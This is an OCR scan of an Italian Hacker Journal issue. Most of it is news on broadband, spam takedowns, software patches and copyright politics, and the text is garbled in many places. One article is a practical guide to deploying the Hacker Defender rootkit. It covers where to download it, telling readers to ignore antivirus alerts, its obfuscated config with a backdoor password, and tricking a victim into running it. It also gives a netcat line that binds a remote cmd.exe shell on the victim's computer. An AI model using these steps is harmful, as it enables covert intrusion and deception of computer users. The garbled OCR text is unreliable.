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hack er (hak'dr) 

'Persona che si diverte ad esplorare i dettagli dei sistemi di programmazione 

e come espandere le loro capacità, a differenza di molti utenti, 

che preferiscono imparare solamente il minimo necessario." 
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Digital Divide 



? al progresso non significa credere che un pi 



so ci sia già stato 
(Franz Kafka 



Siamo il fanalino di coda in Europa e rischiamo di "perdere il treno della 
banda larga". 

Chi abita in un grande centro urbano, non se ne rende conto. Può tenere il 
router acceso notte e giorno, scaricare 24/7 con eMule, chattare e navigare 
in ogni momento. Sembra quasi impossibile ma ci sono ancora tanti utenti, 
magari a pochi chilometri di distanza da noi, che invece tutte queste cose 
se le sognano: il massimo che possono ottenere per placare la propria fame 
telematica è una connessione a 56K con il vecchio modem analogico. Si 
chiama Digital Divide e verso la fine del 2004 è nata anche un'associazione 
come punto di incontro per tutti quelli che abitano e lavorano in zone non 
coperte dalla banda larga (www.antidigitaldivide.org). 

Poche settimane fa, ha cominciato a circolare in Rete il documento di 
Francesco Caio, preparato per il Governo circa lo sviluppo della rete in 
Italia, in cui si prospetta la creazione di un Network di Nuova Generazione. 
Tralasciamo qui le polemiche seguite alla diffusione del documento (serve 
davvero una rete più veloce? dove si trovano i soldi?) e concentriamo la 
nostra attenzione sull'annuncio di Paolo Romani, viceministro allo Sviluppo 
Economico con delega alle Comunicazioni, seguito all'analisi del documento 
stesso: "Entro la fine del 2012 tutti gli italiani potranno connettersi a Internet 
a banda compresa tra 2 e 20 Mbps". 

A prescindere da tutte le complicazioni legate al necessario scorporo 
della rete telefonica da Telecom (Oscar Cicchetti, responsabile Telecom del 
mercato domestico ha già detto che di scorporo non se ne parla e che la 
diffusione del Network di Nuova Generazione succederà gradualmente, anno 
dopo anno e soprattutto quando Telecom Italia riterrà che i clienti saranno 
disposti a "pagarla") ciò che infastidisce ancora una volta è la politica degli 
annunci completamente slegata dalla realtà e da qualsiasi analisi tecnica. 

2012 significa fra tre anni! quanto tempo ha impiegato FastWeb a cablare 
Milano? Ora, non per essere disfattisti, ma se va bene, e dico se va bene 
(Expo insegna) fra tre anni si potrebbe posare la prima pietra. Qui si parla di 
rifare la rete telefonica italiana. 

Siamo il fanalino di coda in Europa, se non vogliamo "perdere il treno della 
banda larga" e cancellare il Digital Divide sarà il caso che la nostra classe 
dirigente metta da parte annunci trionfali e cominci d affrontare i problemi 
con lo scopo di risolverli. Ora. 

The Guilty 



HACKER JOURNAL: INTASATE LE NOSTRE CASELLI 



Diteci cosa ne pensate di HJ, siamo tutti raggiungibili via e-mail, tramite lettera o messo 

a cavallo... Vogliamo sapere se siete contenti, critici, incazzati o qualunque altra cosa! 

Appena possiamo rispondiamo a tutti, scrivete! 

redazione@hackerjournal.it 



SECURITY UPDATE 
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DI giorno 4 giugno, la U.S. 
Federai Trade Commission 
ha ordinato la disconnes- 
sione di Pricewert LLC, un 
fornitore di servizi Internet ri- 
tenuto coinvolto nella diffusio- 
ne di spam, malware e porno- 
grafia infantile (la prima udien- 
za è prevista per il 15 giugno). 
A distanza di una settimana, se- 
condo uno studio dell'email secu- 
rity vendor Marshal8e6, il calo del 
volume dello spam è stato del 15%. 
Il takedown di Pricewert LLC 




avrebbe coinvolto Cutwail, uno 
dei più noti botnet mondiali, 
che da solo coprirebbe circa il 
35% di tutto lo spam mondiale. 
Si tratta quindi di una bella vit- 
toria ma non c'è da rallegrar- 
si più di tanto: ricorderete che 
nel novembre del 2008, a se- 
guito della chiusura di McCo- 
lo Corporation, il volume del- 
lo spam mondiale era diminui- 
to per qualche tempo addirittura 
del 70% per poi ritornare progres- 
sivamente ai livelli tradizionali. 
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0iusto un paio di numeri fa, 
più precisamente su Ha- 
cker Journal 176, parla- 
vamo dei rischi collega- 
ti all'utilizzo di Adobe Reader. 
Da una ricerca condotta da Mikko Hyppo- 
nen, Chief Reserarch Officer di F-Secure, 
risultava che addirittura il 47% degli attac- 
chi ai sistemi informativi rilevati dall'inizio 
dell'anno avessero avuto come protago- 
niste le falle dell'applicazione e si pone- 
va l'accento sulla lentezza con cui Ado- 
be avesse affrontato il problema: poche 
patch e soprattutto rilasciate con tempi- 
stiche assolutamente inadeguate rispetto 
all'ampiezza del problema (pensiamo alla 
diffusione mondiale del plugin). È passa- 
to poco più di un mese ed ecco che qual- 



cosa si muove: Brad Arkin, responsabile 
per la sicurezza della Casa di San Jose, 
ha pubblicato sul suo blog la notizia che 
a partire dalla prossima estate gli aggior- 
namenti di Acrobat Reader verranno rila- 
sciati con cadenza trimestrale. Non solo, 
pare sia stato scelto come giorno di pub- 
blicazione il martedì ovvero in contempo- 
ranea con la pubblicazione delle patch 
di Microsoft. Pare inoltre che gli aggior- 
namenti riguarderanno tutte le versio- 
ni del Reader e non solo le più recenti. 
Cosa abbia spinto improvvisamen- 
te Adobe a premere sull'acceleratore 
non è dato sapere, ma siamo sicuri che 
la pressione esercitata dai programmi 
open source alternativi, affidabili e sicu- 
ri, abbia giocato un ruolo non secondario. 



Adobe 
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Itracker sono dei piccoli pro- 
grammi che permettono ad 
alcuni siti, come ad esempio i 
motori di ricerca, di controllare 
in tempo reale l'attività di deter- 
minati portali ritenuti strategici. 
In base ad una ricerca effettuata 
dall'università statunitense di 
Berkley, Google monitora il 92% 
dei siti più importanti del mondo 
(348.059 dei 393.829 domini più 
visitati al mondo) grazie alla pre- 
senza costante di tracker che regi- 
strano e inviano direttamente a 
Big G informazioni sull'affluenza 
e le preferenze dei navigatori. Per 
fortuna il grado di invadenza dimi- 
nuisce via via che i siti diventano 
meno importanti fino a rag- 
giungere un 3% dei 400.000 siti 
web più popolari del pianeta. Si 
tratta comunque di una presenza 
ingombrante anche se solo per 
individuare i trend dei navigatori. 
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riportati dai suoi modelli di macbook, ha deciso di estendere 
da 2 a 3 anni la garanzia dei suoi popolarissimi notebook. 

Il motivo di questa decisione è in gran parte dovuto ai numerosi malfunzio- 
namenti delle schede grafiche Nvidia 9400 che tendono a surriscaldarsi 
velocemente causando a volte anche danni irreparabili agli altri componenti 
del portatile. In un primo momento Apple aveva semplicemente rilasciato un 
nuovo firmware per i Mac Book che offriva un miglior controllo delle ventole 
di dissipazione: evidentemente la cosa non è bastata agli utenti, che hanno 
continuato a lamentarsi per i, comunque numerosi, problemi del loro com- 
puter. Presto fatto: Apple ha allungato la garanzia permettendo a tutti coloro 

che avevano il PC 
> danneggiato di 
ricevere le cure 
del caso. Del 
resto, già i clienti 
della Mela sono 
pochi, perderne 
altri per un paio 
di schede video 
da sostituire non 
sarebbe stato 
sicuramente 
conveniente. 
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QUANDO L'HACKING 
AVORI CON LA UGGE 

rare nel sistema informatico di un 
ili center e controllare le sue tele- 
ire di sicurezza, di solito è un atto che 
issere punito con la galera, anche se 
o di ammirazione visto che si tratta di 
lerazione tecnicamente difficilissima. 
via quando a farlo sono i carabinieri la 
Dettiva cambia totalamente. In barba 
olite barzellette, i carabinieri di una 


caserma di Genova sono riu- 1 m 
sciti ad accedere da remoto al 1 
sistema di controllo di un internet 1 
point e ad arrestare in flagrante ■ 
10 spacciatori di droga. L'attività ] 
di spaccio avveniva regolar- | 
mente all'interno del locale all'in- 
saputa del suo proprietario che ■ t 
non aveva mai notato movimenti 
sospetti: per fortuna c'erano le 
telecamere di sicurezza a fare il ^^H 
lavoro del distratto esercente e r 
ad aiutare i carabinieri a piani- 
ficare la proficua retata. 
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PHONECRYPT 



Mi NEWS 



E DITE ADDIO ALLE INTERCETTAZIONI 



Se solo Luciano Moggi l'avesse saputo... Una società di software 
tedesca, Securstar, molto attiva nello sviluppo di applicazioni 
per la protezione dei dati digitali, ha recentemente rilasciato Pho- 
necrypt, un programma dedicato a chi teme di essere spiato al 
cellulare e vuole proteggere le sue conversazioni e i suoi SMS. 
Il programma utilizza un protocollo AES256 per codificare le conver- 
sazioni in modo tale da renderle inutilizzabili anche in caso di inter- 
cettazione. Chiaramente il destinatario della chiamata, della mail o 
deH'SMS deve utilizzare lo stesso programma per ricevere i dati. In 
pratica non appena parte la chiamata i due telefoni si inviano una 
chiave di codifica che cambia ogni 4 secondi in modo da rendere 
pressoché impossibile decriptare la conversazione. Phonecrypt 
per il momento funziona solo su smartphone dotati di sistema operativo Windows Mobile, 
ma non si esclude che presto arrivino anche versioni per il Balckberry e l'iPhone di Apple. 



DNO ZAD ALLA CONTE 



HI ODAMA 



Il problema della sicurezza 
tutto negli Stati 



nformatica è molto sentito, soprat- 
Uniti dove aziende e organizzazioni governative hanno 
nei loro PC informazioni a volte determinanti per il destino del Pianeta. 

Proprio per questo motivo il Presidente degli Stati Uniti Barack Obama ha deciso di isti- 
tuire un nuovo ufficio alla Casa Bianca che si occuperà di stu- 
diare soluzioni per aumentare i livelli di sicurezza informatica di 
chi tratta materiali sensibili e informazioni riservate. A guidare 
il nuovo gabinetto ci sarà un super esperto, uno zar come lo ha 
definito lo stesso Presidente, che avrà il compito di analizzare 
e prevedere attività terroristche e di spionaggio industriale il 
tutto senza intaccare i diritti civili dei cittadini USA e la loro 
privacy: Obama infatti assicura che non verrà imposta a privati 
e aziende alcuna regola di comportamento per garantire la sicu- 
V- AbVW "~ v rezza, se non quelle già in uso dettate dal comune buon senso. 



H WiHMa'x é' qifaéi pronto 





W WW 



o, non si tratta di un insulto 
informatico ma del lavoro 
di alcuni ragazzi giapponesi che 
hanno pensato di sfruttare le incre- 
dibili capacità e la versatilità del 
loro iPod Touch per costruire un 
robottino comandato proprio dal 
lettore multimediale di Apple. 
Un po' tozzo nel design e ancora goffo 
nei movimenti, il robot-pod tuttavia 
risponde egregiamente ai comandi 
impartiti dai suoi inventori tramite l'in- 
terfaccia touch dell'iPod ed un'appli- 
cazione appositamente sviluppata. 
Certo, digitare comandi sulla faccia di 
un robot non sembra certo il modo più 
pratico per controllarlo ma il team giap- 
ponese sta già studiando un sistema 
per comandare il droide attraverso 
un secondo iPod utilizzando la tec- 
nologia wireless... nel frattempo non 
resta che fargli i complimenti per l'idea, 
la realizzazione e l'hacking dell'iPod! 



n PC, il sole, la spiagt 

banda larga! Beh, q, 
mettono le società che nel gennaio scorso si sono aggiu- 
dicate gli appalti regionali per l'erogazione di servizi di 
collegamento ad Internet tramite tecnologia Wi-Max. 
La verità è che il bando ha spezzettato molto il panorama del Wi-Max 
italiano affidandolo a numerose società medio-piccole che forni- 
scono servizi in aree geografiche limitate. Questo stratagemma ha 
arginato lo strapotere dei grandi gruppi telefonici (Tim e Vodafone 
su tutti) dalla lotta per la nuova tecnologia Wireless ma ha fatto sì 



una copertura Wi-Max. Per questo 
motivo quest'estate alcune regioni 
cominceranno a pubblicizzare abbona- 
menti per il Wi-Max mentre altre par- 
tiranno solo successivamente. Se vi 
trovate in Piemonte, Marche, Toscana, 
Emilia e Sicilia forse avete qualche 
possibilità, per gli altri... pazienza!!! 



:*■* 
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PAROLE PERICOLOSE, 
IL WEB NE È PIENO 



A volte basta cercare informazioni sul proprio 
show preferito o sulla proprio squadra 
del cuore per trovarsi il PC pieno di malware. 

Questo è ciò che emerge dall'indagine condotta dai 
laboratori MacAfee sulle parole più digitate nei motori 
di ricerca e su quanto queste siano collegate a peri- 
colosi siti di spam, o malware. Una delle attività pre- 
ferite dei pirati, infatti, è quella di inserire nei metatag 
dei loro siti trappola molte parole chiave legate ad 
argomenti popolari come la musica, lo sport o la TV. 
Questo sistema imbroglia i motori di ricerca che indi- 
cizzano il sito pericoloso come un portale di informa- 
zioni e lo segnalano tra i primi risultati della ricerca. 

Le parole più pericolose- 
sarebbero l'immancabile 
free, unito a games, apps 
e soprattutto sex, lyrics 
(testi di canzoni), Mp3, 
ma anche legati a nomi di 
personaggi famosi come 
Rihanna. È divertente 
sapere che esiste anche 
una classifica italiana di 
parole pericolose: ai primi 
posti della classifica tro- 
viamo istruzione, digitale 
terrestre, uomini e donne e 
Roma... forza lupi allora. 





\ 



CAOINET SOLO PER DONNE! 



Azzurro per i maschietti, rosa per le femminucce. 
Inizia sempre così, dalla nascita, la differen- 
ziazione che vuole uomini e donne diversi, non 
solo per natura ma anche per gusti, idee, consumi. 

Questo luogo comune, il più delle volte vincente, 
deve aver ispirato anche la nuove linea di cabinet 
per Pc firmata InWin dedicati esclusivamente al 
pubblico femminile. Tecnicamente i prodotti della 
linea rosa non si discostano dai modelli tradizionali 

e montano tutte 
le più moderne 
tecnologie. 
La differenza 
sta esclusiva- 
mente nel look: 
al posto degli 
anonimi case 
per computer o 
di quelli moddati 
con luci strobo- 
scopiche e led 
di ogni tipo, i 
cabinet di inWin 
sono decorati 
con fantasie 
floreali e cri- 
stalli Swarovsky. 
Come dire... adesso 
sì che le donne si interes- 
seranno ai PC! Onestamente 
ci sembra un modo molto semplicistico di andare 
incontro ai gusti delle donne, che comunque già da 
tempo utilizzano il computer quanto, se non più, dei 
loro colleghi uomini. Tuttavia, se piace... 
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IL 22 OTTODRE 



Sta per arrivare e questa volta 
ancora non sappiamo se è una 
minaccia o una promessa. Stiamo par- 
lando di Windows 7 il nuovo sistema 
operativo di Microsoft che, dopo 
l'ultima release pubblica, sta per rag- 
giungere i negozi di tutto il mondo. 
La data di debutto è stata fissata da 
Microsoft qualche giorno fa e sarà il 22 



ottobre di quest'anno. Si tratta di un 
record per Microsoft, mai così veloce 
a sfornare un sistema operativo: sono 
passati solo 2 anni e 10 mesi da quel 




22 gennaio 2007 in cui Windows Vista 
fece per la prima volta capolino tra i 
negozi, riscuotendo l'insuccesso plane- 
tario che tutti sappiamo. Evidentemente 
l'azienda di Bill Gates ha voluto correre 
ai ripari con questo Windows 7. Chi l'ha 
provato a fondo ne è rimasto soddisfatto: 
in pratica è quello che doveva essere 
Windows Vista 2 anni fa, snello, stabile, 
veloce. Bene Microsoft... ma perché 
dover spendere altri 200 o 300 euro per 
avere qualcosa che avreste dovuto rila- 
sciare gratis come doveroso aggiorna- 
mento di Windows Vista? 



^^^^^^^^^^^^^^^^— 
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HOT NEWS 



DirectX 



ANGORA UNA VOLTA A RISCHIO! 



Microsoft ha da poco diffuso una nota in cui avverte i suoi utenti di un 
possibile rischio infezione dovuto a un bug di programmazione trovato 
all'interno delle sue DirectX: queste famosissime librerie grafiche rap- 
presentano il cuore multimediale di Windows e si occupano di tutto quello 
che è audio-video dalla gestione dei filmati, alla musica, ai giochi 3D. 
La vulnerabilità è stata riscontrata nei moduli DirectShow (quelli dedicati alla 
gestione dei video) in tutte le versioni DirectX dalla 7 in poi: a causa di questo bug, 
un file video Quicktime appositamente modificato potrebbe far esegure ai nostri com- 
puter un codice malevolo in grado agevolare il controllo da remoto del nostro PCda 

parte di qualche 
maleintenzionato. 
Un sistema molto 
ingegnoso messo 
a punto dai pirati 
per impadronirsi 
dei nostri dati o per 
utilizzare il nostro 
computer come 
copertura per 
attacchi a server o 
altri portali. Come 
da copione da 
Microsoft annun- 
ciano di essere 
già al lavoro per 
tappare la falla... 
come da copione 
una volta che 
avranno risolto 
questa, se ne aprirà 
un'altra. Da qualche 
altra parte! 
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BRUXELLES 



on il 7,1% (circa 200.000 
voti) il Partito Pirata svedese 
otterrà 1 o forse 2 seggi al Par- 
lamento europeo. Merito anche 
della notorietà avuta durante il 
processo. Ma sicuramente su 
questo inatteso successo elet- 
torale hanno avuto un peso 
predominante le leggi sempre 
più restrittive in tema di copy- 
right paventate da molti governi. 
Luca Neri , autore del libro "La 
baia dei pirati - Assalto al copy- 
right" commenta così: "Il suc- 
cesso del Piratpartiet in queste 
elezioni rappresenta uno spar- 
tiacque di portata storica (...) Per 
quanto ricca e potente possa 
essere la lobby delle multina- 
zionali del copyright, per quante 
leggi liberticide e cause legali 
questa possa promuovere, il 
segnale 
e h e e i 1 

arriva dalla ^ y 

Svezia non 
potrebbe |V 
essere più ' 
chiaro: il ? 
futuro e 
dei pirati!" 



IL GRPYRIRHT 
RI INSEGNA A SCUOIA 

Cosa hai oggi in classe? Dunque, italiano 
due ore, compito di matematica, inglese 
e poi mi interrogano in diritto d'autore. 

Sembra una conversazione surreale ma 
è quello che sperano le principali major 
di tutto il mondo: l'introduzione di una 
materia che, fin dall'infanzia, insegni ai 
bambini il rispetto del diritto d'autore. La 
copyright alliance è una lobby americana 



che ha recentemente avanzato la proposta 
di inserire lo studio del diritto d'autore e 
delle norme che regolano la proprietà intel- 
lettuale all'interno delle materie scolastiche 
magari al posto di attività inutili come la 




filosofia o la storia! L'associazione, manco 
a dirlo supportata da colossi come la RIAA 
e MPAA, sostiene che il rispetto del copy- 
right è uno degli elementi fondanti della 
società moderna e del progresso civile 
e sociale per cui dovrebbe diventare per 
i giovani americani una sorta di educa- 
zione civica. Chiaramente la posizione delle 
Copyright Alleance ci fa davvero sorridere, 
tuttavia non possiamo sapere quanto seria- 
mente potrebbe valutarla il congresso ame- 
ricano, soprattutto a seguite delle spinte 
fatte dall'industria discografica e cinema- 
tografica in questa direzione. 
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Iono 378 artisti provenienti 
da 28 Paesi (Italia, Spagna, 
Uruguai, Germania, Turkia, 
France, United Kingdom, 
Argentina, Portogallo, Messico, 
Canada, Polonia, Olanda, Ungheria, 
Latvia, Irlanda, Svezia, Repub- 
blica Ceca, Grecia, Danimarca, 
USA, Austria, Australia, Mace- 
donia, Bulgaria) e 293 tra perfor- 
mances, workshop e showcases. 
Questi i numeri della 7° edizione di 
LPM, meeting internazionale di vj e 
video-artisti che si è svolto a Roma dal 
28 al 31 maggio presso i locali del Bran- 
caleone, diventando una delle più vaste 
e attive comunità del settore. 



:: Genesi 

LPM nasce intorno a fIXer un'ap- 
plicazione in flash pensata per 
realizzare vjset live: il software 
ideato da Gianluca Del Gobbo 

- gratuitamente scaricabile online, ma 
con licenza proprietaria - riscuote suc- 
cesso e quando nel 2002 si decide di 
"fare una festa" per la sua nuova release, 
ecco che a Roma arrivano circa 60 vj da 
tutta Europa. Di loro spontanea volontà e 
pagandosi il biglietto, spinti dalla voglia di 
incontrarsi e performare insieme. A unire 
la comunità fondamentale il contributo 
di Valeria Guarcini (aka Jemma Temp/ 
Nikky) e Francesco "Wabear" Macarone 



&S2SSK-—. 



Palmieri, noti agitatori della scena cul- 
turale queer/underground romana, che 
li ha visti protagonisti di esperienze 
come il Phagoff. L'idea è semplice: 
offrire ospitalità e un luogo attrezzato 
per performare pubblicamente, par- 
tecipare a workshop, presentazioni, 
showcases. Non è poco... 

:: Evoluzione 

Dalla prima edizione il meeting vede 
una crescita esponenziale, asse- 
standosi su una media di 350 presenze. 

I primi tre anni l'ospitalità viene offerta 



[ p 8 ]_[ www.hackerjournal.it ] 



f ^ T 



> 



dagli organizzatori che aprono letteral- 
mente le loro case - e quelle degli amici. 
Quando si arriva di colpo a 200 parteci- 
panti. Da quel momento il gruppo inizia a 
ragionare su come dotarsi di un minimo 
di fondi e strutture per evitare il rischio di 
implosione. Le risorse principali vendono 
dal network e dalle energie messe in 
campo da partner e piccoli sponsor, fino 
a quando nel 2007 viene vinto un bando 
della Provincia di Roma, che quest'anno 
ammonta a 32.000 euro, utilizzati in 
sostanza per pagare l'accoglienza. Gli 
artisti continuano a pagare da sé le spese 
di viaggio. 

:: Digital Freedoms... 

Quello che vogliamo mettere però 
particolarmente in luce di LPM è il 
suo legame con le ed. libertà digitali. 

Fino al 2007 il meeting scegli infatti come 
location il Linux Club, locale gestito 
dall'omonima associazione che ha svolto 
negli anni un'azione di diffusione del sof- 
tware libero e della cultura opensource. 
Il locale ha purtroppo chiuso i battenti 
da due anni e dal 2008, per mantenere 
questo legame naturale, LPM dedica la 
giornata di apertura a questo tema in 
modo esplicito. L'anno scorso, presso il 
Mattatoio, ha ospitato iniziative e dibattiti 
sul diritto d'autore come la Degradarte. 
E il 2009 non è stato da meno. Il pro- 
gramma, denso di presentazioni, instal- 
lazioni e tavole rotonde con ospiti inter- 




> "TCDTD", visione dai retro: sui muro io 
<<scroscio>>remixatodicontenutiproteW. 



nazionali, ha visto una stratta collabora- 
zione con il REFF - ne abbiamo parlato 
qualche numero fa - di cui LPM è uno dei 
primi sostenitori. A descrivere concisa- 
mente l'orientamento politico e culturale 
della giornata l'installazione "TCDTD" 
acronimo di "Throwing Copyright Down 
The Toilet" realizzata da Salvatore 
laconesi (xDxD.vs.xDxD) nello spazio 
REFF. Un meraviglioso wc ripescato 
da una discarica con tanto di sciac- 
quone dove buttare al cesso il copy- 
right: munito di webcam, proiettore 
e software di riconoscimento del 
movimento, tirando la familiare cate- 
nella i primi 1200 risultati di Google 
per "contenuto protetto" vengono 
remixati, spixelati e proiettati 
con uno scroscio sulla parete... Il 
dibattito centrale è ruotato nel pome- 
riggio intorno a REFF.erence 2, una 
tavola rotonda a cui hanno parte- 
cipato avvocati, curatori, artisti attivisti, 
Marco Scialdone, Rossella Ongaretto, 
Lorenzo Imbesi, Jaromil, Simona Lodi, 
Leo Sorge Rusel Carrens (myRMX, Los 
Angeles) e, in collegamento da remoto, 
Brett Gaylor (OpenSourceCinema) dal 
Canada e il gruppo Perpetuai Art Machine 
da New York; come presenza istituzionale 
c'è infine Alessandro Ferrante,portavoce 
dell'Assessorato alla Cultura del Comune 
di Roma, che mette sul piatto criticità e 
scelte per l'innovazione che l'assessorato 
sta affrontando. Oggetto principale di 
discussione quali le politiche culturali 
capaci di supportare la creatività nel con- 
temporaneo e quali i modelli di business 
efficaci, il tutto intrecciato al necessario 
adeguamento dell'attuale legislazione sul 
diritto d'autore. E in questo si fa notare 
Russel Carrens. myRMX è un esempio 
di giovane start-up (nata 2 mesi fa) il cui 
modello di business è legato a un uso 
intelligente della musica libera attraverso 
un'applicazione per cellulari che permette 
al pubblico di remixare e usare sample e 
tracce di giovani artisti per creare nuove 
musiche, variazioni e pacchetti di remix 
che vengono rimessi in circolazione. 
Come dice spiega Carrens "We want to 
make music an open process", un pro- 
getto che lascia intravedere nuove strade 
percorribili da chi è interessato. 




i, Piemonte &" _ 



^Conclusioni 

LPM è senz'altro un meeting riuscito, 
capace di creare una commistionoin 
fra i vj, la videoarte e il clubing 

con tematiche vicine per loro natura al 
diritto d'autore, alla culture jamming, alle 
libertà digitale, riuscendo intessere rap- 
porti con frange interessanti dei movi- 
menti queer. E se fIXer è un software pro- 
prietario, completamente opensource è 
la modalità con cui l'evento è stato con- 
cepito. Compresa la sua economia... 
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on c'è metodo mi; 
studiare un rootkit, e le sue 
potenzialità, che imparare 
a usarlo. Nati in ambiente 
Unix, i rootkit sono applicazioni che 
fanno parte della famiglia dei trojan, 
e la loro specialità, si fa per dire, è quella 
di nascondere file e software malevoli. 
Al contrario dei classici backdoor, i 
rootkit offrono un controllo minore sul 
computer di una vittima, ma proprio 
per questo, sono molto più difficili da 
individuare. Insomma, nelle mani sba- 
gliate (o in quelle giuste, dipende dai 
punti di vista) si tramutano in imbattibili 
strumenti di hacking. Fatte le debite e 
sommerie presentazioni, torniamo al 
fulcro del discorso: usare un rootkit. In 
realtà non ce ne sono molti di completi 
sulla piazza, perché buona parte degli 
hacker preferisce confezionare spe- 



cifiche, e instabili, versioni ad hoc . 
Hacker Defender, per fortuna, è dotato 
di tutte le funzioni del classico rootkit, 
si nasconde piuttosto bene alle analisi 
degi antivirus, è facilmente reperibile 
e, per chi è alle prime armi, facile da 
configurare e usare. Gli hacker più 
esperti apprezzano invece le pos- 
sibilità di rifinirlo e personalizzarlo 
secondo specifiche esigenze. 

:: Dove trovarlo 

Partendo proprio dalle reperibilità 
del software, Hacker Defender si 
trova senza problemi nei circuiti 
P2P come BitTorrent e Rapidshare, 
ma anche una rapida ricerca in 
Google offre link utili allo scopo. 
Lo si trova con stringhe di ricerca del 
tipo "Hacker Defender download", o 



download hxdef (hxdef e la sigla 
con cui è maggiormente conosciuto). 
Nel momento in cui scriviamo, il codice 
sorgente (i binari si trovano altrove) 
di Hacker Defender si trova anche 
all'indirizzo www.hacker-soft.net/Soft/ 
Soft_11659.htm, mentre il sito ufficiale, 
hxdef.org, appare inattivo ormai da un 
bel po'. Ovviamente, come accade 
con tutti i software di questo tipo, il 
nostro antivirus può rilevare l'archivio 
ZIP di Hacker Defender come una 
minaccia. Se così fosse, ignoriamo 
l'avviso, prendendoci ovviamente 
tutte le responsabilità per i problemi 
che possono verificarsi. Il cuore del 
rootkit è il suo file configurazione, 
in formato INI (di solito hxdef.ini) e 
quindi perfettamente modificabile con 
un qualsiasi editor di testo. 
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(H<«idden T»a/ "blel 

>h"xtìer* 

rlc<md\.ex<e:: 

"C:\:R:0:0\:t::P:r>:0:C<:e:S:S:e<:S:>) 

h<x>d<e>:l<* 

<\r\C:\m\d.\e\x\e 

/(/H/idd\en Servi "cesi 
Ha>:Ck"er//Def\ender* 

/ 
(Hhdden ni "»egKeys) 
Ha"c<kerDef\e/ndenoo 
LE":GACY_H\ACK7ERDEFE\ND:ER100 
Ha : "c<kerDef\e/nderDrvlOO 
LE":GACY_H\ACK/ERDEFE\ND:ERDRV100 

/ 
\"CHid:den\> : RegValues) " "' 



:: Trucchi di mascheramento 

Molte delle voci presenti, come visto, 
sono modificate, al fine di essere 
meno rilevabili dai software antivirus. 

Così, per esempio, un LE":GACY_H\ 
ACK/ERDEFE\ND:ER100 corrisponde 
in realtà a un LEGACY_HACKERDE- 
FENDER100. I caratteri "superflui", 
ovviamente, sono ignorati dal rootkit 
quando viene il momento di interpretare 
il file INI. Una volta presa confidenza 
con le varie voci e la rispettiva nomen- 



:(St/\artup\ Min/) 

":[\Fr<ee>> S:"<pa>ce) 

[>H<ì>d d:en<>\ P/ : or : t<s )\ : 

(Set/tin/Ags) / 
P:assw\ord=hxdef-rulez 
Ba:Ckd:"oorShell=hxdefB$.exe 
Fil:eMappin\gN/ame=_.-=(Hacker Deten- 
nero-.. 

Serv:iceName=HackerDefender100 
>Selrvi:ceDisp<://la"yName=HXD Servi- 
ce 100 

Ser>viC:eDllescr<ip:t'lon=powerfulNT 
rootkit 

Dri<ve\rN:ame=HackerDefenderDrvlOO 
D:riv>erFileNam/e=hxdefdrv.sys 



datura, è possibile configurare di tutto 
punto il rootkit, per esempio stabilendo i 
processi ai quali legarlo e il nome dei file 
da sfruttare nel computer della vittima. 
Una volta modificato a piacimento il 
file INI, si passa all'avvio del rootkit. 
In linea di massima, basta avviare il 
comando come hxdef100.exe, seguito 
dal nome del file INI. Ovviamente sta 
a noi decidere come convincere un 
utente ad avviare un comando di questo 
tipo. Per esempio tramite un invitante 
file batch che promette la visione di 



immagini celestiali... 

Se non specifichiamo il nome del file 

INI, l'eseguibile cerca il file EXENAME. 

INI e, in mancanza di questo, non 

esegue alcuna istruzione specifica. 

Oltre a specificare un file INI, possiamo 

indicare dei comandi opzionali. Ce ne 

sono ben quattro: 

-:installonly 

installa il rootkit, ma senza eseguirlo 

-:refresh 

forza il caricamento delle impostazioni 

del file INI 

-:noservice 

non installa il rootkit 

-:uninstall 

blocca tutte le attività legate al rootkit e 

lo disinstalla dalla memoria 

Ora che abbiamo conosciuto, som- 
mariamente, questo favoloso e poten- 
tissimo software, non resta che com- 
prenderne i principali utilizzi pratici. 
Quello più ovvio, e classico, è l'accop- 
piata con Netcat. Si tratta di un altro 
software che, per un hacker, non ha 
certo bisogno di presentazioni. Detto 
anche "il coltellino svizzero dell'hacker", 
una delle sue funzioni più utili è quella 
di creare una connessione tra il nostro 
computer e quello della vittima. Per 
integrare Netcat in Hacker Defender, 
basta specificare nel succitato file INI 
l'apposita istruzione, del tipo : 

:[St/\artup\ Run/] 

C:\nc.exe? -L -p 300 -t -e cmd.exe 

Dove "-p 300" indica l'apertura la con- 
nessione del computer della vittima 
tramite la porta numero 300. 




IP ! Ulta QTB-faw f % Li 



u:cm: ' w " i\m I 1^..:.j*hp,i . +:,» 

T 1 1 at Ioti 111 pi — **__ - *>ic Lir 0*1 m*à*f\v- . . 

.fflTk- ; |£ «ÈHM .tetra v£rf mà#r 3 IO 
; ij| fip; rifu 



IlLJ-1k,1 1H P p Mu rfur ■! 



•LI 1» 

ramili 



-I cfcio- iio -*Lr ]*— 



lab W Nntii- tmm m t 

■Umtf nrita riunì i 1«1 

■■!! ■ rwik* nhlm rtqiiin : >■■ 

14IW feiTftpCti fCTtU [4l*M4i tfftE] 






M FiUtv. àìw ^#t* *n l^lHi| 



O Ecco il contenuto dell'archivio ZIP col quale viene distribuito O // file INI di configurazione include anche delle ottime istruzioni 

Hacker Defender non piacerà al nostro antivirus ma non importa. in ceco (a dire il vero non molto utili) e in inglese. 
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Qi sono ambienti in cui il 
mantenimento di ben pre- 
cisi standard risulta essere 
il core business aziendale. 

È il caso delle trasmissioni televisive: 
nessuna emittente si sognerebbe mai 
di trasmettere con standard diversi da 
quelli usati normalmente dai televisori 
perché nessuno riuscirebbe mai a ri- 
cevere correttamente le sue trasmis- 
sioni. In realtà, questo orientamen- 
to ha dei limiti ben precisi: quando 
un gran numero di reti televisive se- 
gue standard diversi e l'appeal del- 
le trasmissioni è elevato, il pubblico 
si adegua abbastanza rapidamente. 
Sta accadendo ora, in modo radica- 



le, per l'introduzione del digitale ter- 
restre ma è già accaduto in passato 
per la televisione via satellite. 

::Onceuponatime... 

Veri pionieri delle trasmissioni via 
satellite, i francesi di Canal Plus 
iniziarono a usare negli anni '90 
un sistema di codifica delle tra- 
smissioni chiamato Mediaguard. 
Da tutti era conosciuto come SE- 
CA perché sviluppato da una so- 
cietà, Nagra France, precedente- 
mente nota come Societé Europeén- 
ne de Controle d'Access (SECA, ap- 
punto). Rispetto alle prime trasmis- 



sioni, basate su Irdeto e facilmente 
decodificabili anche dai non aven- 
ti diritto. Il nuovo sistema di codifi- 
ca, almeno inizialmente, appariva 
piuttosto solido e disponeva di una 




O L 'idea di creare un decoder ad hoc senza 
permettere la concorrenza ha escluso dal 
mercato moltissime aziende che sono "cos- 
trette " a creare solo lettori di nicchia. 
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flessibilità d'utilizzo notevole: i se- 
gnali potevano essere decodificati 
sia grazie a decoder dedicati, Gold 
